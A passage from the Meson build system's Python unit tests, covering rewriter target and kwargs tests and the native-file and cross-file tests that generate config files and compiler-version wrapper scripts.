'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
if isinstance(v, (bool, int, float)):
f.write("{}={}\n".format(k, v))
elif isinstance(v, list):
f.write("{}=[{}]\n".format(k, ', '.join(["'{}'".format(w) for w in v])))
else:
f.write("{}='{}'\n".format(k, v))
return filename
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary, entry=None):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
raise unittest.SkipTest('No llvm-installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
elif is_osx():
binary = 'python'
else:
binary = 'python2'
# We not have python2, check for it
for v in ['2', '2.7', '-2.7']:
rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc == 0:
break
else:
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', binary, entry='python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
# but we don't support that ATM so lets not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
def test_user_options(self):
testcase = os.path.join(self.common_test_dir, '43 options')
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0),
('CaseSenSiTivE', 'SOME other Value'),
('CASESENSITIVE', 'some other Value')]:
config = self.helper_create_native_file({'project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_user_options_command_line_overrides(self):
testcase = os.path.join(self.common_test_dir, '43 options')
config = self.helper_create_native_file({'project options': {'other_one': True}})
self.init(testcase, extra_args=['--native-file', config, '-Dother_one=false'])
def test_user_options_subproject(self):
testcase = os.path.join(self.unit_test_dir, '79 user options for subproject')
s = os.path.join(testcase, 'subprojects')
if not os.path.exists(s):
os.mkdir(s)
s = os.path.join(s, 'sub')
if not os.path.exists(s):
sub = os.path.join(self.common_test_dir, '43 options')
shutil.copytree(sub, s)
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0)]:
config = self.helper_create_native_file({'sub:project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_option_bool(self):
# Bools are allowed to be unquoted
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({'built-in options': {'werror': True}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
# Test that no-per subproject options are inherited from the parent
if 'werror' in each['name']:
self.assertEqual(each['value'], True)
break
else:
self.fail('Did not find werror in build options?')
def test_option_integer(self):
# Bools are allowed to be unquoted
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({'built-in options': {'unity_size': 100}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
# Test that no-per subproject options are inherited from the parent
if 'unity_size' in each['name']:
self.assertEqual(each['value'], 100)
break
else:
self.fail('Did not find unity_size in build options?')
def test_builtin_options(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
self.fail('Did not find werror in build options?')
def test_builtin_options_conf_overrides_env(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'pkg_config_path': '/foo'}})
self.init(testcase, extra_args=['--native-file', config], override_envvars={'PKG_CONFIG_PATH': '/bar'})
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/foo'])
break
else:
self.fail('Did not find pkg_config_path in build options?')
def test_builtin_options_subprojects(self):
testcase = os.path.join(self.common_test_dir, '102 subproject subdir')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both', 'c_args': ['-Dfoo']}, 'sub:built-in options': {'default_library': 'static'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
# Test that no-per subproject options are inherited from the parent
if 'c_args' in each['name']:
# This path will be hit twice, once for build and once for host,
self.assertEqual(each['value'], ['-Dfoo'])
found += 1
elif each['name'] == 'default_library':
self.assertEqual(each['value'], 'both')
found += 1
elif each['name'] == 'sub:default_library':
self.assertEqual(each['value'], 'static')
found += 1
self.assertEqual(found, 4, 'Did not find all three sections')
def test_builtin_options_subprojects_overrides_buildfiles(self):
# If the buildfile says subproject(... default_library: shared), ensure that's overwritten
testcase = os.path.join(self.common_test_dir, '230 persubproject options')
config = self.helper_create_native_file({'sub2:built-in options': {'default_library': 'shared'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertIn(cm.exception.stdout, 'Parent should override default_library')
def test_builtin_options_subprojects_dont_inherits_parent_override(self):
# If the buildfile says subproject(... default_library: shared), ensure that's overwritten
testcase = os.path.join(self.common_test_dir, '230 persubproject options')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both'}})
self.init(testcase, extra_args=['--native-file', config])
def test_builtin_options_compiler_properties(self):
# the properties section can have lang_args, and those need to be
# overwritten by the built-in options
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'c_args': ['-DFOO']},
'properties': {'c_args': ['-DBAR']},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'c_args':
self.assertEqual(each['value'], ['-DFOO'])
break
else:
self.fail('Did not find c_args in build options?')
def test_builtin_options_compiler_properties_legacy(self):
# The legacy placement in properties is still valid if a 'built-in
# options' setting is present, but doesn't have the lang_args
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'properties': {'c_args': ['-DBAR']},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'c_args':
self.assertEqual(each['value'], ['-DBAR'])
break
else:
self.fail('Did not find c_args in build options?')
def test_builtin_options_paths(self):
# the properties section can have lang_args, and those need to be
# overwritten by the built-in options
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'bindir': 'foo'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'foo')
break
else:
self.fail('Did not find bindir in build options?')
def test_builtin_options_paths_legacy(self):
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'bar')
break
else:
self.fail('Did not find bindir in build options?')
def test_builtin_options_paths_legacy(self):
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'bar')
break
else:
self.fail('Did not find bindir in build options?')
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functionality not directly related to
cross compiling.
This is mainly aimed to testing overrides from cross files.
"""
def setUp(self):
super().setUp()
self.current_config = 0
self.current_wrapper = 0
def _cross_file_generator(self, *, needs_exe_wrapper: bool = False,
exe_wrapper: T.Optional[T.List[str]] = None) -> str:
if is_windows():
raise unittest.SkipTest('Cannot run this test on non-mingw/non-cygwin windows')
if is_sunos():
cc = 'gcc'
else:
cc = 'cc'
return textwrap.dedent("""\
[binaries]
c = '/usr/bin/{}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
{}
[properties]
needs_exe_wrapper = {}
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""".format(cc,
'exe_wrapper = {}'.format(str(exe_wrapper)) if exe_wrapper is not None else '',
needs_exe_wrapper))
def _stub_exe_wrapper(self) -> str:
return textwrap.dedent('''\
#!/usr/bin/env python3
import subprocess
import sys
sys.exit(subprocess.run(sys.argv[1:]).returncode)
''')
def test_needs_exe_wrapper_true(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
def test_needs_exe_wrapper_false(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=False))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertNotRegex(out, r'Skipped:\s*1\n')
def test_needs_exe_wrapper_true_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
s = Path(d) / 'wrapper.py'
with s.open('wt') as f:
f.write(self._stub_exe_wrapper())
s.chmod(0o774)
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(
needs_exe_wrapper=True,
exe_wrapper=[str(s)]))
self.init(testdir, extra_args=['--cross-file=' + str(p), '-Dexpect=true'])
out = self.run_target('test')
self.assertRegex(out, r'Ok:\s*3\s*\n')
def test_cross_exe_passed_no_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
self.build()
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
# The test uses mocking and thus requires that the current process is the
# one to run the Meson steps. If we are using an external test executable
# (most commonly in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = self._cross_file_generator()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
# tests this test will fail, os mock the environment, pop
# it, then test
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def helper_create_cross_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_user_options(self):
# This is just a touch test for cross file, since the implementation
# shares code after loading from the files
testcase = os.path.join(self.common_test_dir, '43 options')
config = self.helper_create_cross_file({'project options': {'testoption': 'some other value'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--cross-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_builtin_options(self):
